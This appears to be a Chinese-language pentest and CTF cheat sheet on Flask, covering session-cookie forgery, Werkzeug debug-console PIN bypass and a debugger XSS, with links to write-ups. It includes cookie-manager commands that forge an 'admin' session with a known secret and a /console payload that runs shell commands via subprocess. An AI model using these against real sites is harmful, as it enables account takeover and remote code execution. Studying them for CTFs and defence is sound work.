flask

---

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

---

session伪造

flask-session 的三部分为 json->zlib->base64 后的源字符串. 时间戳. hmac 签名信息

相关文章

• flask session伪造admin身份

相关工具

• noraj/flask-session-cookie-manager

  python3 flask_session_cookie_manager3.py decode -s "thisiskey" -c "eyJ1c2VybmFtZSI6eyIgYiI6IllXUnRhVzQ9In19.YWfurA.sHD-E9MuX4QZJQ4cU07WYykbJZU" # 解密
  python3 flask_session_cookie_manager3.py encode -s "thisiskey" -t "{'username': b'admin'}"  # 加密

writeup

• [HCTF 2018] admin

• BUUCTF N1BOOK [第一章 web入门]

---

flask-debug

简述

debug 模式需要验证 pin, 而 pin 并非真随机值, 根据机器上的参数可以计算出来

当然,如果目标配置了 WERKZEUG_DEBUG_PIN=off 那就不需要 pin 了😂

相关文章

• Flask渗透01：debug模式中的RCE

• Flask RCE Debug Mode

• Flask开启debug时PIN码的安全性问题

• Flask debug 模式 PIN 码生成机制安全性研究笔记

POC | Payload | exp

/console

import subprocess;out = subprocess.Popen(['whoami'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT);stdout,stderr = out.communicate();print(stdout);

---

flask-debug xss

相关文章

• Flask Debugger页面上的通用XSS漏洞分析和挖掘过程记录

• https://github.com/pallets/werkzeug/pull/1001